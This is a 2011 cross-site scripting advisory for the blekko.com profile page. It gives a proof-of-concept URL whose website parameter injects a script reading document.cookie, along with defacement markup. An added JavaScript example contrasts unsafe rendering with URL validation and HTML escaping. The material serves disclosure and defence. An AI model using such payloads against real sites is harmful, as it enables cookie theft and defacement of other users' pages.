Blekko.com suffers from a cross-site scripting (XSS) vulnerability.
# Date: 24.11.2011
# Author: Sony
# Site: http://blekko.com
# My blog and PoC:
http://st2tea.blogspot.com/2011/11/blekkocom-web-search-engine-cross-site.html
What is blekko.com?
You can read about it here:
http://en.wikipedia.org/wiki/Blekko
The XSS is in the profile page, in the website link field (the website parameter):
http://blekko.com/tag/profile?m=1&email=editpro%2540bk.ru&name=&desc=&website=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cimg%20src=%20http://www.tnr.com/sites/default/files/imagecache/thumbnail_landing/RomaniaFlag.jpg%20align=center%3E%3Cmarquee%20scrollamount=%223%22%3ESystem%20Error..well,%20joke,%20it%27s%20only%20xss..We%20can%20see%20Cross%20Site%20Scripting%20on%20the%20Blekko%20-%20web%20search%20engine.%20By%20Sony.%20http://st2tea.blogspot.com%3C/marquee%3E
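One way to close this class of bug on the server side, shown as an added example that is not from the original advisory and is not Blekko's code: validate the website value as an http(s) URL, then HTML-encode it at the point of output. The function names and the link markup are assumptions.

```javascript
// Added example: names and markup are assumptions, not Blekko's code.

// Vulnerable pattern: the profile's website value is concatenated into HTML
// as-is, so any markup in it is parsed by the browser.
function renderWebsiteUnsafe(website) {
  return '<div class="website">' + website + '</div>';
}

// Encode the five characters that are significant in HTML text and
// quoted attribute values.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Input validation: accept only absolute http(s) URLs of sane length.
// Returns the normalized URL string, or null if the value is rejected.
function normalizeWebsite(raw) {
  if (typeof raw !== 'string' || raw.length > 2048) return null;
  let url;
  try {
    url = new URL(raw.trim());
  } catch (err) {
    return null; // not an absolute URL (e.g. raw HTML)
  }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return null;
  return url.href;
}

// Hardened rendering: validate first, then encode at the point of output.
function renderWebsiteSafe(raw) {
  const href = normalizeWebsite(raw);
  if (href === null) return '';
  const safe = escapeHtml(href);
  return '<a href="' + safe + '" rel="nofollow noopener">' + safe + '</a>';
}

// Constructed inputs: the script payload is the one in the advisory's URL.
const samplePayload = '<script>alert(document.cookie)</script>';
console.log(renderWebsiteUnsafe(samplePayload)); // markup passes through
console.log(JSON.stringify(renderWebsiteSafe(samplePayload))); // ""
console.log(renderWebsiteSafe('https://example.org/a?b=1&c=2'));
```

Validation alone is not the fix: the value is still encoded on output so that a URL containing `&` or quotes cannot break out of the attribute.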